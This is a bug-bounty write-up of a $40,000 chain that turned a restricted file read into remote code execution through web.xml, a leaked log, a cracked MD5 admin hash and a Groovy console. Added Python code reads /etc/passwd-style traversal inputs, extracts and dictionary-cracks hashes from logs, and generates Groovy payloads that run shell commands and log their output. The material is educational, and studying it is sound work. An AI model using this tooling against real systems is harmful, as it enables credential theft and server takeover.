Abdullah Nawaf, a bug bounty hunter with a strong track record on Bugcrowd, is known for chasing high-impact findings rather than stopping at the first reportable bug. Working with his partner Orwa Atyat, he turned a limited path traversal vulnerability into a full remote code execution (RCE) chain and earned $40,000 for it. The steps of that chain are worth walking through, because each one depended on not giving up at the previous dead end.
It started with routine reconnaissance on a single target subdomain, http://admin.target.com:8443. The root of the site returned a 404, which is where many hunters would have moved on. Abdullah instead fuzzed paths under the host and found /admin/Download, which answered 200 OK with an empty body. An empty 200 on an endpoint named Download is a strong hint that a handler is there and is simply waiting for a parameter it has not been given yet, as the original report on Medium describes.
The next step was to test that handler for path traversal and file-read behaviour. The /download endpoint turned out to take a filename parameter: requesting http://admin.target.com:8443/admin/download?filename=/js/main.js returned the contents of that JavaScript file. There was a limit, though. Names were resolved relative to the application deployed under /admin/, and anything outside it was refused, so this was a restricted file read inside the web application rather than a traversal of the whole server filesystem. The question became what was worth reading inside that boundary.
Abdullah's answer was /WEB-INF/web.xml, the Java servlet deployment descriptor. It lives inside the application directory, so it was within reach of the download function, but a servlet container never serves WEB-INF/ directly, which is exactly why it is a good target for a file read: it maps URL patterns to servlets and so lists routes that fuzzing may never find. The file revealed three URLs, one of them an incident-report endpoint. Requesting that endpoint triggered the download of a live application log file, and the log was where the chain really began.
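To make the "limited" traversal concrete, here is an added Python model of the download handler as the write-up describes it, not the target's real code. The restricted version resolves the requested name under the application root and blocks anything that escapes it, yet still hands out WEB-INF/web.xml; the hardened version adds the missing allow-list of public directories. A small parser then pulls the url-pattern entries out of the descriptor, which is how web.xml gives up routes. The directory layout and the three URL patterns in the sample descriptor are constructed for this example (the write-up names only the incident-report one).

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed deployment descriptor; only /incident-report comes from the
# write-up, the other two patterns are placeholders.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet-mapping>
    <servlet-name>download</servlet-name>
    <url-pattern>/download</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>incident</servlet-name>
    <url-pattern>/incident-report</url-pattern>
  </servlet-mapping>
  <servlet-mapping>
    <servlet-name>status</servlet-name>
    <url-pattern>/status</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Top-level directories a download endpoint should ever serve from.
PUBLIC_DIRS = {"js", "css", "images"}


def build_webapp():
    """Create a throwaway application directory with the two files
    the story mentions: js/main.js and WEB-INF/web.xml."""
    root = tempfile.mkdtemp(prefix="webapp-")
    os.makedirs(os.path.join(root, "js"))
    os.makedirs(os.path.join(root, "WEB-INF"))
    with open(os.path.join(root, "js", "main.js"), "w") as f:
        f.write("console.log('main');\n")
    with open(os.path.join(root, "WEB-INF", "web.xml"), "w") as f:
        f.write(WEB_XML)
    return root


def _read(path):
    try:
        with open(path, "rb") as f:
            return f.read()
    except FileNotFoundError:
        return None


def download_limited(root, filename):
    """The handler as described: names resolve under the app root and
    ../ cannot escape it, but WEB-INF/ is as readable as js/."""
    app_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(app_root, filename.lstrip("/")))
    if not target.startswith(app_root + os.sep):
        return None
    return _read(target)


def download_hardened(root, filename):
    """Same containment check plus an allow-list of public directories,
    so WEB-INF/ and META-INF/ are never served."""
    app_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(app_root, filename.lstrip("/")))
    rel = os.path.relpath(target, app_root)
    if rel.startswith("..") or os.path.isabs(rel):
        return None
    if rel.split(os.sep)[0] not in PUBLIC_DIRS:
        return None
    return _read(target)


def servlet_urls(web_xml):
    """List every <url-pattern> in a deployment descriptor, ignoring
    whichever XML namespace the file declares."""
    doc = ET.fromstring(web_xml)
    return [
        e.text.strip()
        for e in doc.iter()
        if e.tag.rsplit("}", 1)[-1] == "url-pattern" and e.text
    ]


if __name__ == "__main__":
    root = build_webapp()
    print(download_limited(root, "/js/main.js"))
    print(download_limited(root, "/../../../etc/passwd"))
    print(servlet_urls(download_limited(root, "/WEB-INF/web.xml")))
    print(download_hardened(root, "/WEB-INF/web.xml"))
```

The containment check alone is what made the original traversal "limited", and it is also why the bug looked minor at first: the interesting part is that containment within the application root is not the same as containment within the files the application is meant to serve.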
The log contained admin credentials, including an MD5 hash of the admin password. An unsalted MD5 of a password offers little protection against a wordlist, and the credentials were enough to log in to the admin panel. Inside the panel was a function named export_step2.xhtml that exposed a Groovy console for running Groovy scripts on the server.
A Groovy console on a Java application is code execution by design, so RCE was effectively in hand. The catch was that running commands produced no visible output in the response: execution was blind. The question was where the output was going. Abdullah recalled the live log file served by the incident-report endpoint: anything a script wrote to the application log could be read back from there, which turned the log into the missing output channel for the Groovy console.
The full impact came from a simple loop: log in with the leaked credentials, open the Groovy console, run a command, then fetch the log to read its output. That chain of a restricted file read, a leaked descriptor, a leaked log, leaked credentials and an exposed console met the bar for RCE with demonstrable output, and it shows how much of the impact came from persistence rather than from any single exotic bug.
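The log file does double duty in this story: it leaks the admin hash, and later it carries the output of blind Groovy commands. The following Python is an added example, not code from Abdullah's write-up, that works both jobs over a constructed log excerpt. It pulls user/MD5 pairs out of log lines, shows why an unsalted MD5 in a log is as good as the password for anything in a wordlist, builds a Groovy script that wraps a command's output in unique markers before logging it, and recovers that output from the log text afterwards. The `log` object in the Groovy payload is an assumed logger exposed by the console that writes to the same file the incident-report endpoint serves; the write-up does not say how the output actually reached the log, and the log lines, user name and hash here are all made up.

```python
import hashlib
import re
import secrets

# Constructed log excerpt standing in for the live log served by the
# incident-report endpoint. User, hash and command output are invented;
# the hash is md5("password").
SAMPLE_LOG = (
    "2024-01-09 10:12:01 INFO  AuthService - login user=admin "
    "passwordHash=" + hashlib.md5(b"password").hexdigest() + " result=OK\n"
    "2024-01-09 10:12:02 INFO  Scheduler - nightly export finished\n"
    "2024-01-09 10:14:30 INFO  GroovyConsole - <<m1>>uid=1001(tomcat) gid=1001(tomcat)\n"
    "<</m1>>\n"
)

# Tiny constructed wordlist; a real attempt would use a large one.
WORDLIST = ["admin", "letmein", "password", "welcome1"]

# A user= token followed somewhere on the line by a 32-hex-digit token.
USER_HASH_RE = re.compile(r"user=(\w+).*?\b([0-9a-f]{32})\b")


def find_leaked_hashes(log_text):
    """Return (user, md5) pairs for every log line carrying a 32-hex token."""
    hits = []
    for line in log_text.splitlines():
        m = USER_HASH_RE.search(line)
        if m:
            hits.append((m.group(1), m.group(2)))
    return hits


def crack_md5(digest, wordlist):
    """Unsalted MD5 falls to a dictionary lookup; None if nothing matches."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


def groovy_escape(s):
    """Escape s for use inside a Groovy single-quoted string literal."""
    return s.replace("\\", "\\\\").replace("'", "\\'")


def new_tag():
    """Random per-command marker so outputs in a shared log never collide."""
    return secrets.token_hex(4)


def groovy_payload(cmd, tag):
    """Groovy script for the console: run cmd via /bin/sh and write its stdout
    to the application log between <<tag>> and <</tag>> markers.
    `log` is an assumed logger name, not something the write-up states."""
    return (
        f"def out = ['/bin/sh', '-c', '{groovy_escape(cmd)}'].execute().text\n"
        f"log.info('<<{tag}>>' + out + '<</{tag}>>')\n"
    )


def extract_command_output(log_text, tag):
    """Recover the text groovy_payload logged for this tag, or None."""
    pattern = re.escape(f"<<{tag}>>") + r"(.*?)" + re.escape(f"<</{tag}>>")
    m = re.search(pattern, log_text, re.S)
    return m.group(1) if m else None


if __name__ == "__main__":
    for user, digest in find_leaked_hashes(SAMPLE_LOG):
        print(f"{user}: {digest} -> {crack_md5(digest, WORDLIST)!r}")
    tag = new_tag()
    print(groovy_payload("id", tag))
    print(repr(extract_command_output(SAMPLE_LOG, "m1")))
```

The per-command random tag is the part worth keeping even outside this example: with a shared, append-only log as the output channel, a fixed marker would make the second command's output indistinguishable from the first, and a `re.S` search between unique open and close markers handles multi-line output without caring about the log's own line format.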
Abdullah submitted two reports, one for the leaked credentials and one for the RCE, and the program paid $40,000 in total. The lesson is less about any one technique than about refusing to stop at a 404, an empty response, or a file read that at first seems confined to harmless static assets.
In short, Abdullah Nawaf and Orwa Atyat's chain is a good reminder that a low-severity primitive such as a restricted file read becomes high impact when it is pointed at the right files, and that logs, deployment descriptors and administrative consoles are exactly the kind of files and features to look for.

